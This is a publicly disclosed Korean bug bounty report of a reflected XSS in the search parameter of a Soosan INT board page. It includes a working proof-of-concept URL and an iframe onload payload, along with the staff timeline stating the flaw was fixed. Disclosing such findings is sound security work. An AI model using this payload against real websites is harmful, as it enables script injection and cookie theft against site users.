Reflected XSS

작성자 grooveshark 프로그램 수산아이앤티

WEB 종료됨 중간 보상없음 작성일: 2021년 10월 27일 (3년 전) 마지막 업데이트일: 2021년 12월 30일 (3년 전)

취약점 유형

Reflected XSS

상세내용

개요

Reflected XSS 실행

재현 과정

[취약점 재현을 하기 위한 과정을 서술해 주세요]
https://www.soosanint.com/board/board_list.php?board_id=news&search_type=title&searcher=%22%3E%3Ciframe%20src=%22%22%20onload=alert(document.cookie)%3E

취약한 파라미터)
searcher

삽입한 스크립트)
"><iframe src="" onload=alert(document.cookie)>

  1. [step2]
  2. [step3]

예상되는 취약점 발생 원인

특수문자 필터링 적용 미흡

패치 방법

특수문자 필터링 적용 및 html 엔티티 적용

예상 결과 및 파급력

악성 스크립트 실행 가능

기타사항 및 레퍼런스

Description

타임라인

grooveshark 님이 티켓을 제출했습니다. 2021년 10월 27일 (3년 전)
Dona BUGCAMP STAFF 님이 상태를 '제출됨'에서 '처리중'으로 변경했습니다. 2021년 11월 11일 (3년 전)
Steve BUGCAMP STAFF 님이 댓글을 남겼습니다. 2021년 11월 12일 (3년 전)

안녕하세요. 제보자님
수산아이앤티 버그바운티 프로그램에 제보해주셔서 감사합니다.

제출해주신 티켓은 유효한 티켓으로 Reflected XSS 취약점이 발현되는 것을 확인하였습니다. 해당 티켓은 담당자에게 전달될 예정이며, 담당자 업무 일정으로 인해 패치가 지연될 수 있는점 참고부탁드립니다.

감사합니다.

Steve BUGCAMP STAFF 님이 상태를 '처리중'에서 '종료됨'으로 변경했습니다. 2021년 12월 30일 (3년 전)

안녕하십니까 제보된 취약점이 조치되었습니다. 수산아이앤티 버그바운티 프로그램에 참여해주셔서 감사합니다.

Steve BUGCAMP STAFF 님이 공개상태를 '비공개'에서 '전체공개'로 변경했습니다. 2021년 12월 30일 (3년 전)